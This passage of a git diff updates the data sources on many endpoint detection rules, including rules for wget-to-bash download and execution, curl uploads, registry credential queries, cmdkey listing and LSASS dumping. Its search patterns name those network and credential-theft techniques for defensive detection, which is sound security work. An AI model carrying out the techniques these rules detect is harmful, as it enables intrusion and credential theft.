--- a/detections/endpoint/wermgr_process_spawned_cmd_or_powershell_process.yml
+++ b/detections/endpoint/wermgr_process_spawned_cmd_or_powershell_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the spawning of cmd or PowerShell pr
   environment, posing a severe threat to system security.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as cmdline
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where Processes.parent_process_name = "wermgr.exe" `process_cmd` OR `process_powershell`
diff --git a/detections/endpoint/wget_download_and_bash_execution.yml b/detections/endpoint/wget_download_and_bash_execution.yml
index 5284757eb7..cc8783ec62 100644
--- a/detections/endpoint/wget_download_and_bash_execution.yml
+++ b/detections/endpoint/wget_download_and_bash_execution.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of wget on Linux or MacOS to
   leading to system compromise and unauthorized access to sensitive data.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wget
   (Processes.process="*-q *" OR Processes.process="*--quiet*"  AND Processes.process="*-O-
diff --git a/detections/endpoint/windows_ad_dsrm_account_changes.yml b/detections/endpoint/windows_ad_dsrm_account_changes.yml
index 6d87eae63b..2e7df399df 100644
--- a/detections/endpoint/windows_ad_dsrm_account_changes.yml
+++ b/detections/endpoint/windows_ad_dsrm_account_changes.yml
@@ -6,8 +6,8 @@ author: Dean Luxton
 type: TTP
 status: production
 data_source:
-- Sysmon EventID 12
-- Sysmon EventID 13
+- Sysmon EventID 1 AND Sysmon EventID 12 
+- Sysmon EventID 1 AND Sysmon EventID 13
 description: The following analytic identifies changes to the Directory Services Restore
   Mode (DSRM) account behavior via registry modifications. It detects alterations
   in the registry path "*\\System\\CurrentControlSet\\Control\\Lsa\\DSRMAdminLogonBehavior"
diff --git a/detections/endpoint/windows_adfind_exe.yml b/detections/endpoint/windows_adfind_exe.yml
index e23d9c6d48..396269cb15 100644
--- a/detections/endpoint/windows_adfind_exe.yml
+++ b/detections/endpoint/windows_adfind_exe.yml
@@ -15,6 +15,8 @@ description: 'The following analytic identifies the execution of `adfind.exe` wi
   privilege escalation or lateral movement.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process="* -f *"
   OR Processes.process="* -b *") AND (Processes.process=*objectcategory* OR Processes.process="*
diff --git a/detections/endpoint/windows_alternate_datastream___base64_content.yml b/detections/endpoint/windows_alternate_datastream___base64_content.yml
index 9bf07cecb7..5367f1dac7 100644
--- a/detections/endpoint/windows_alternate_datastream___base64_content.yml
+++ b/detections/endpoint/windows_alternate_datastream___base64_content.yml
@@ -6,7 +6,7 @@ author: Steven Dick, Teoderick Contreras, Michael Haag, Splunk
 status: production
 type: TTP
 description: The following analytic detects the creation of Alternate Data Streams
-  (ADS) with Base64 content on Windows systems. It leverages Sysmon Event ID 15, which
+  (ADS) with Base64 content on Windows systems. It leverages Sysmon EventID 15, which
   captures file creation events, including the content of named streams. ADS can conceal
   malicious payloads, making them significant for SOC monitoring. This detection identifies
   hidden streams that may contain executables, scripts, or configuration data, often
diff --git a/detections/endpoint/windows_apache_benchmark_binary.yml b/detections/endpoint/windows_apache_benchmark_binary.yml
index bf1478007b..99ff92162d 100644
--- a/detections/endpoint/windows_apache_benchmark_binary.yml
+++ b/detections/endpoint/windows_apache_benchmark_binary.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the Apache Benchmar
   is required to determine the intent and scope of the activity.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.original_file_name=ab.exe
   by Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/windows_archive_collected_data_via_rar.yml b/detections/endpoint/windows_archive_collected_data_via_rar.yml
index 52f7397116..7372166416 100644
--- a/detections/endpoint/windows_archive_collected_data_via_rar.yml
+++ b/detections/endpoint/windows_archive_collected_data_via_rar.yml
@@ -7,6 +7,8 @@ status: production
 type: Anomaly
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies the execution of RAR utilities to archive
   files on a system. It leverages data from Endpoint Detection and Response (EDR)
   agents, focusing on process names, GUIDs, and command-line arguments. This activity
diff --git a/detections/endpoint/windows_autoit3_execution.yml b/detections/endpoint/windows_autoit3_execution.yml
index 226da555e3..8b6a637a9d 100644
--- a/detections/endpoint/windows_autoit3_execution.yml
+++ b/detections/endpoint/windows_autoit3_execution.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the execution of AutoIt3, a scripting
   language often used for automating Windows GUI tasks and general scripting. It identifies
   instances where AutoIt3 or its variants are executed by searching for process names
diff --git a/detections/endpoint/windows_autostart_execution_lsass_driver_registry_modification.yml b/detections/endpoint/windows_autostart_execution_lsass_driver_registry_modification.yml
index c3c0f33fdc..16e498f509 100644
--- a/detections/endpoint/windows_autostart_execution_lsass_driver_registry_modification.yml
+++ b/detections/endpoint/windows_autostart_execution_lsass_driver_registry_modification.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to undocumented regist
   malicious, this could allow attackers to gain unauthorized access to sensitive information
   and escalate privileges within the environment.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path IN ("*\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt","*\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt")
diff --git a/detections/endpoint/windows_binary_proxy_execution_mavinject_dll_injection.yml b/detections/endpoint/windows_binary_proxy_execution_mavinject_dll_injection.yml
index 2f14bd3f8a..2c897efca7 100644
--- a/detections/endpoint/windows_binary_proxy_execution_mavinject_dll_injection.yml
+++ b/detections/endpoint/windows_binary_proxy_execution_mavinject_dll_injection.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of mavinject.exe for DLL inj
   persistence within the environment, posing a severe security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=mavinject.exe
   Processes.process IN ("*injectrunning*", "*hmodule=0x*") by Processes.dest Processes.user
diff --git a/detections/endpoint/windows_bypass_uac_via_pkgmgr_tool.yml b/detections/endpoint/windows_bypass_uac_via_pkgmgr_tool.yml
index baaaa620e6..3fc287e4ba 100644
--- a/detections/endpoint/windows_bypass_uac_via_pkgmgr_tool.yml
+++ b/detections/endpoint/windows_bypass_uac_via_pkgmgr_tool.yml
@@ -7,6 +7,8 @@ status: production
 type: Anomaly
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the execution of the deprecated 'pkgmgr.exe'
   process with an XML input file, which is unusual and potentially suspicious. This
   detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on
diff --git a/detections/endpoint/windows_cached_domain_credentials_reg_query.yml b/detections/endpoint/windows_cached_domain_credentials_reg_query.yml
index c1be8ead59..7978a53dcf 100644
--- a/detections/endpoint/windows_cached_domain_credentials_reg_query.yml
+++ b/detections/endpoint/windows_cached_domain_credentials_reg_query.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies a process command line querying t
   or lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where  `process_reg` AND Processes.process
   = "* query *" AND Processes.process = "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*"
diff --git a/detections/endpoint/windows_change_default_file_association_for_no_file_ext.yml b/detections/endpoint/windows_change_default_file_association_for_no_file_ext.yml
index 5b487622a8..b2183ba46f 100644
--- a/detections/endpoint/windows_change_default_file_association_for_no_file_ext.yml
+++ b/detections/endpoint/windows_change_default_file_association_for_no_file_ext.yml
@@ -15,6 +15,8 @@ description: The following analytic detects attempts to change the default file
   to system compromise or data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime  from datamodel=Endpoint.Processes where `process_reg` AND Processes.process="*
   add *" AND Processes.process="* HKCR\\*" AND Processes.process="*\\shell\\open\\command*"
diff --git a/detections/endpoint/windows_com_hijacking_inprocserver32_modification.yml b/detections/endpoint/windows_com_hijacking_inprocserver32_modification.yml
index 0dca0667c7..55eaacf00d 100644
--- a/detections/endpoint/windows_com_hijacking_inprocserver32_modification.yml
+++ b/detections/endpoint/windows_com_hijacking_inprocserver32_modification.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the modification of the InProcServer
   access to the compromised environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_reg` Processes.process=*inprocserver32*
   by Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/windows_command_and_scripting_interpreter_hunting_path_traversal.yml b/detections/endpoint/windows_command_and_scripting_interpreter_hunting_path_traversal.yml
index bae81a6e17..80cf509cd0 100644
--- a/detections/endpoint/windows_command_and_scripting_interpreter_hunting_path_traversal.yml
+++ b/detections/endpoint/windows_command_and_scripting_interpreter_hunting_path_traversal.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies path traversal command-line execu
   movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes  by Processes.original_file_name Processes.process_id
   Processes.parent_process_id Processes.process_hash Processes.dest Processes.user
diff --git a/detections/endpoint/windows_command_and_scripting_interpreter_path_traversal_exec.yml b/detections/endpoint/windows_command_and_scripting_interpreter_path_traversal_exec.yml
index 5158e43544..0fc8280bc9 100644
--- a/detections/endpoint/windows_command_and_scripting_interpreter_path_traversal_exec.yml
+++ b/detections/endpoint/windows_command_and_scripting_interpreter_path_traversal_exec.yml
@@ -15,6 +15,8 @@ description: The following analytic detects path traversal command-line executio
   other living-off-the-land binaries (LOLBins).
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes where  Processes.process="*\/..\/..\/..\/*"
   OR Processes.process="*\\..\\..\\..\\*" OR Processes.process="*\/\/..\/\/..\/\/..\/\/*"
diff --git a/detections/endpoint/windows_command_shell_dcrat_forkbomb_payload.yml b/detections/endpoint/windows_command_shell_dcrat_forkbomb_payload.yml
index 3c450a831b..e8e2f0e169 100644
--- a/detections/endpoint/windows_command_shell_dcrat_forkbomb_payload.yml
+++ b/detections/endpoint/windows_command_shell_dcrat_forkbomb_payload.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of a DCRat "forkbomb"
   disruption of services.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.parent_process) as parent_process values(Processes.parent_process_id)
   as parent_process_id values(Processes.process_id) as process_id dc(Processes.parent_process_id)
diff --git a/detections/endpoint/windows_command_shell_fetch_env_variables.yml b/detections/endpoint/windows_command_shell_fetch_env_variables.yml
index 657cb15392..5dba1abde8 100644
--- a/detections/endpoint/windows_command_shell_fetch_env_variables.yml
+++ b/detections/endpoint/windows_command_shell_fetch_env_variables.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies a suspicious process command line
   or persist within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process = "*cmd /c
   set" OR Processes.process = "*cmd.exe /c set" AND NOT (Processes.parent_process_name
diff --git a/detections/endpoint/windows_conhost_with_headless_argument.yml b/detections/endpoint/windows_conhost_with_headless_argument.yml
index 3c99f93275..cc79f44408 100644
--- a/detections/endpoint/windows_conhost_with_headless_argument.yml
+++ b/detections/endpoint/windows_conhost_with_headless_argument.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: 'The following analytic detects the unusual invocation of the Windows
   Console Host process (conhost.exe) with the undocumented --headless parameter. This
   detection leverages Endpoint Detection and Response (EDR) telemetry, specifically
diff --git a/detections/endpoint/windows_credential_dumping_lsass_memory_createdump.yml b/detections/endpoint/windows_credential_dumping_lsass_memory_createdump.yml
index 81aa7093f0..fe68d9e5c1 100644
--- a/detections/endpoint/windows_credential_dumping_lsass_memory_createdump.yml
+++ b/detections/endpoint/windows_credential_dumping_lsass_memory_createdump.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of CreateDump.exe to perform
   this could lead to unauthorized access and lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=createdump.exe
   OR Processes.original_file_name="FX_VER_INTERNALNAME_STR" Processes.process="*-u
diff --git a/detections/endpoint/windows_credentials_from_password_stores_creation.yml b/detections/endpoint/windows_credentials_from_password_stores_creation.yml
index ee120e6d34..ecef8bec4a 100644
--- a/detections/endpoint/windows_credentials_from_password_stores_creation.yml
+++ b/detections/endpoint/windows_credentials_from_password_stores_creation.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the execution of the Windows OS tool cmdkey.exe,
   which is used to create stored usernames, passwords, or credentials. This detection
   leverages data from Endpoint Detection and Response (EDR) agents, focusing on process
diff --git a/detections/endpoint/windows_credentials_from_password_stores_deletion.yml b/detections/endpoint/windows_credentials_from_password_stores_deletion.yml
index 756e14a4d0..8a95cf7a02 100644
--- a/detections/endpoint/windows_credentials_from_password_stores_deletion.yml
+++ b/detections/endpoint/windows_credentials_from_password_stores_deletion.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the execution of the Windows OS tool cmdkey.exe
   with the /delete parameter. This detection leverages data from Endpoint Detection
   and Response (EDR) agents, focusing on process execution logs and command-line arguments.
diff --git a/detections/endpoint/windows_credentials_from_password_stores_query.yml b/detections/endpoint/windows_credentials_from_password_stores_query.yml
index 085ac15b7f..03147e0096 100644
--- a/detections/endpoint/windows_credentials_from_password_stores_query.yml
+++ b/detections/endpoint/windows_credentials_from_password_stores_query.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the Windows OS tool
   maintain control over compromised systems for further exploitation.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name="cmdkey.exe"
   OR Processes.original_file_name = "cmdkey.exe" AND Processes.process = "*/list*"
diff --git a/detections/endpoint/windows_credentials_in_registry_reg_query.yml b/detections/endpoint/windows_credentials_in_registry_reg_query.yml
index 206d4627e5..f2d7b84ded 100644
--- a/detections/endpoint/windows_credentials_in_registry_reg_query.yml
+++ b/detections/endpoint/windows_credentials_in_registry_reg_query.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies processes querying the registry f
   security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_reg` AND Processes.process
   = "* query *" AND Processes.process IN ("*\\Software\\ORL\\WinVNC3\\Password*",
diff --git a/detections/endpoint/windows_curl_download_to_suspicious_path.yml b/detections/endpoint/windows_curl_download_to_suspicious_path.yml
index 7b943a9259..9665d8ddb2 100644
--- a/detections/endpoint/windows_curl_download_to_suspicious_path.yml
+++ b/detections/endpoint/windows_curl_download_to_suspicious_path.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the use of Windows Curl.exe to down
   compromise of the system.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_curl` Processes.process
   IN ("*-O *","*--output*") Processes.process IN ("*\\appdata\\*","*\\programdata\\*","*\\public\\*")
diff --git a/detections/endpoint/windows_curl_upload_to_remote_destination.yml b/detections/endpoint/windows_curl_upload_to_remote_destination.yml
index 3c5a338023..beba138a0c 100644
--- a/detections/endpoint/windows_curl_upload_to_remote_destination.yml
+++ b/detections/endpoint/windows_curl_upload_to_remote_destination.yml
@@ -14,6 +14,8 @@ description: 'The following analytic detects the use of Windows Curl.exe to uplo
   if the upload was successful and isolate the endpoint if necessary.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_curl` Processes.process
   IN ("*-T *","*--upload-file *", "*-d *", "*--data *", "*-F *") by Processes.dest
diff --git a/detections/endpoint/windows_defacement_modify_transcodedwallpaper_file.yml b/detections/endpoint/windows_defacement_modify_transcodedwallpaper_file.yml
index 4d56e2db30..ab05fafed6 100644
--- a/detections/endpoint/windows_defacement_modify_transcodedwallpaper_file.yml
+++ b/detections/endpoint/windows_defacement_modify_transcodedwallpaper_file.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies modifications to the TranscodedWa
   potentially leading to further system compromise or data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where Processes.process_path !="*\\Windows\\Explorer.EXE" by _time span=1h Processes.process_id
   Processes.process_name Processes.process Processes.dest Processes.process_guid  Processes.original_file_name
diff --git a/detections/endpoint/windows_default_group_policy_object_modified_with_gpme.yml b/detections/endpoint/windows_default_group_policy_object_modified_with_gpme.yml
index 8899947e04..9fced33409 100644
--- a/detections/endpoint/windows_default_group_policy_object_modified_with_gpme.yml
+++ b/detections/endpoint/windows_default_group_policy_object_modified_with_gpme.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects modifications to default Group Policy
   Objects (GPOs) using the Group Policy Management Editor (GPME). It leverages the
   Endpoint data model to identify processes where `mmc.exe` executes `gpme.msc` with
diff --git a/detections/endpoint/windows_defender_exclusion_registry_entry.yml b/detections/endpoint/windows_defender_exclusion_registry_entry.yml
index bd11dc18c9..f2c43428c9 100644
--- a/detections/endpoint/windows_defender_exclusion_registry_entry.yml
+++ b/detections/endpoint/windows_defender_exclusion_registry_entry.yml
@@ -13,7 +13,7 @@ description: The following analytic detects modifications to the Windows Defende
   malicious, this behavior could enable attackers to evade antivirus defenses, maintain
   persistence, and execute further malicious activities undetected.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path = "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\*")
diff --git a/detections/endpoint/windows_delete_or_modify_system_firewall.yml b/detections/endpoint/windows_delete_or_modify_system_firewall.yml
index aa99fe8e6f..cb4428c52e 100644
--- a/detections/endpoint/windows_delete_or_modify_system_firewall.yml
+++ b/detections/endpoint/windows_delete_or_modify_system_firewall.yml
@@ -7,6 +7,8 @@ status: production
 type: Anomaly
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies 'netsh' processes that delete or modify
   firewall configurations. It leverages data from Endpoint Detection and Response
   (EDR) agents, focusing on command-line executions containing specific keywords.
diff --git a/detections/endpoint/windows_deleted_registry_by_a_non_critical_process_file_path.yml b/detections/endpoint/windows_deleted_registry_by_a_non_critical_process_file_path.yml
index f681d34702..1cb171f835 100644
--- a/detections/endpoint/windows_deleted_registry_by_a_non_critical_process_file_path.yml
+++ b/detections/endpoint/windows_deleted_registry_by_a_non_critical_process_file_path.yml
@@ -13,8 +13,8 @@ description: The following analytic detects the deletion of registry keys by non
   payload impacts. If confirmed malicious, this behavior could lead to significant
   system damage, loss of critical configurations, and potential disruption of services.
 data_source:
-- Sysmon EventID 12
-- Sysmon EventID 13
+- Sysmon EventID 1 AND Sysmon EventID 12 
+- Sysmon EventID 1 AND Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count from datamodel=Endpoint.Registry
   WHERE Registry.action=deleted BY _time span=1h Registry.dest Registry.registry_path
   Registry.registry_value_name Registry.registry_key_name Registry.process_guid Registry.registry_value_data
diff --git a/detections/endpoint/windows_disable_change_password_through_registry.yml b/detections/endpoint/windows_disable_change_password_through_registry.yml
index c561835edc..76ee500f88 100644
--- a/detections/endpoint/windows_disable_change_password_through_registry.yml
+++ b/detections/endpoint/windows_disable_change_password_through_registry.yml
@@ -15,7 +15,7 @@ description: The following analytic detects a suspicious registry modification t
   to an attack, allowing the attacker to persist and potentially escalate their access
   within the network.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword"
diff --git a/detections/endpoint/windows_disable_lock_workstation_feature_through_registry.yml b/detections/endpoint/windows_disable_lock_workstation_feature_through_registry.yml
index 24eb798ef3..b74c266c1f 100644
--- a/detections/endpoint/windows_disable_lock_workstation_feature_through_registry.yml
+++ b/detections/endpoint/windows_disable_lock_workstation_feature_through_registry.yml
@@ -15,7 +15,7 @@ description: The following analytic detects a suspicious registry modification t
   allow attackers to sustain their presence and execute further malicious actions
   without user interruption.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation"
diff --git a/detections/endpoint/windows_disable_logoff_button_through_registry.yml b/detections/endpoint/windows_disable_logoff_button_through_registry.yml
index 62e6d17639..c1fb076d93 100644
--- a/detections/endpoint/windows_disable_logoff_button_through_registry.yml
+++ b/detections/endpoint/windows_disable_logoff_button_through_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects a suspicious registry modification t
   response, and allow attackers to maintain persistence and control over the affected
   system.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\*"
diff --git a/detections/endpoint/windows_disable_memory_crash_dump.yml b/detections/endpoint/windows_disable_memory_crash_dump.yml
index e587837d60..1a51b92dff 100644
--- a/detections/endpoint/windows_disable_memory_crash_dump.yml
+++ b/detections/endpoint/windows_disable_memory_crash_dump.yml
@@ -14,7 +14,7 @@ description: The following analytic detects attempts to disable the memory crash
   as seen with HermeticWiper, potentially leading to significant operational disruptions
   and data loss.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   where (Registry.registry_path="*\\CurrentControlSet\\Control\\CrashControl\\CrashDumpEnabled")
diff --git a/detections/endpoint/windows_disable_notification_center.yml b/detections/endpoint/windows_disable_notification_center.yml
index 45cef9986b..d0cdee55a5 100644
--- a/detections/endpoint/windows_disable_notification_center.yml
+++ b/detections/endpoint/windows_disable_notification_center.yml
@@ -13,7 +13,7 @@ description: The following analytic detects the modification of the Windows regi
   and subsequent actions. If confirmed malicious, this could allow an attacker to
   operate stealthily, potentially leading to further system compromise and data exfiltration.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_value_name= "DisableNotificationCenter" Registry.registry_value_data
diff --git a/detections/endpoint/windows_disable_or_modify_tools_via_taskkill.yml b/detections/endpoint/windows_disable_or_modify_tools_via_taskkill.yml
index 762b4cfe59..e35d798836 100644
--- a/detections/endpoint/windows_disable_or_modify_tools_via_taskkill.yml
+++ b/detections/endpoint/windows_disable_or_modify_tools_via_taskkill.yml
@@ -7,6 +7,8 @@ status: production
 type: Anomaly
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies the use of taskkill.exe to forcibly
   terminate processes. It leverages data from Endpoint Detection and Response (EDR)
   agents, focusing on command-line executions that include specific taskkill parameters.
diff --git a/detections/endpoint/windows_disable_shutdown_button_through_registry.yml b/detections/endpoint/windows_disable_shutdown_button_through_registry.yml
index a34a9efea4..e81ee734ce 100644
--- a/detections/endpoint/windows_disable_shutdown_button_through_registry.yml
+++ b/detections/endpoint/windows_disable_shutdown_button_through_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious registry modifications th
   this could impede system recovery efforts, making it difficult to restart the machine
   and remove other harmful modifications.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE ((Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon"
diff --git a/detections/endpoint/windows_disable_windows_event_logging_disable_http_logging.yml b/detections/endpoint/windows_disable_windows_event_logging_disable_http_logging.yml
index 6d858ef12d..930e0fffb4 100644
--- a/detections/endpoint/windows_disable_windows_event_logging_disable_http_logging.yml
+++ b/detections/endpoint/windows_disable_windows_event_logging_disable_http_logging.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of AppCmd.exe to disable HTT
   the intrusion effectively.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where NOT (Processes.parent_process_name  IN
   ("msiexec.exe", "iissetup.exe")) Processes.process_name=appcmd.exe Processes.process
diff --git a/detections/endpoint/windows_disable_windows_group_policy_features_through_registry.yml b/detections/endpoint/windows_disable_windows_group_policy_features_through_registry.yml
index 3870d1fb51..48c54a01a2 100644
--- a/detections/endpoint/windows_disable_windows_group_policy_features_through_registry.yml
+++ b/detections/endpoint/windows_disable_windows_group_policy_features_through_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious registry modifications ai
   analyze and respond to the attack, allowing the attacker to maintain control and
   persist within the compromised environment.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\*"
diff --git a/detections/endpoint/windows_disableantispyware_registry.yml b/detections/endpoint/windows_disableantispyware_registry.yml
index 55092c52fa..22c91d7e31 100644
--- a/detections/endpoint/windows_disableantispyware_registry.yml
+++ b/detections/endpoint/windows_disableantispyware_registry.yml
@@ -15,7 +15,7 @@ description: The following analytic detects the modification of the Windows Regi
   malicious activities such as data encryption, exfiltration, or additional system
   compromise.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Registry where Registry.registry_value_name="DisableAntiSpyware"
diff --git a/detections/endpoint/windows_diskcryptor_usage.yml b/detections/endpoint/windows_diskcryptor_usage.yml
index c47287a5e0..0a2d6aae6f 100644
--- a/detections/endpoint/windows_diskcryptor_usage.yml
+++ b/detections/endpoint/windows_diskcryptor_usage.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of DiskCryptor, identi
